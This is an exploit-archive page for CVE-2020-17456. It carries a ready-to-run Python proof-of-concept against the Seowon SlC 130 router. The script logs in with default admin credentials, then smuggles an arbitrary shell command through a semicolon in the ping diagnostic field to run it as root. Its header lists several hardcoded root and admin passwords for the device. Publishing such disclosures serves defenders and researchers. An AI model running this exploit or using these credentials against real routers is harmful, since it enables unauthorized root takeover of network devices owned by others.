Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution: Posted Aug 21, 2020; Authored by Ali Jalalat; Seowon SlC 130 Router suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-17456; SHA-256 | 2c2caed94290b76cf2dcb160e2fa1928c1b317ff58fa6be49af50b2e9dfe1014; Download | Favorite | View

Seowon SlC 130 Router Remote Code Execution

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec

# Description:
# user can run arbitrary commands on the router as root ! 
# as there are already some hardcoded credentials so there is an easy to trigger exploit

# credentials : 
# user => VIP
# pwd => V!P83869000

# user => Root
# pwd => PWDd0N~WH*4G#DN

# user => root
# pwd => gksrmf28

# user => admin
# pwd => admin
# 

# A  write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import requests
import sys

host = sys.argv[1]

session = requests.Session()

header = { 

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "pplication/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}



datas = {
  
  "Command":"Submit",
  "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
  "browserTime":"081119502020",
  "currentTime":"1597159205",
  "user":"admin",
  "password":"admin"
}


#auth

session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)

#rce

cmd = sys.argv[2]

rce_data = {
  
  "Command":"Diagnostic",
  "traceMode":"ping",
  "reportIpOnly":"",
  "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
  "pingPktSize":"56",
  "pingTimeout":"30",
  "pingCount":"4",
  "maxTTLCnt":"30",
  "queriesCnt":"3",
  "reportIpOnlyCheckbox":"on",
  "btnApply":"Apply",
  "T":"1597160664082"
}

rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)

print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seowon SlC 130 Router Remote Code Execution

Share This

Seowon SlC 130 Router Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems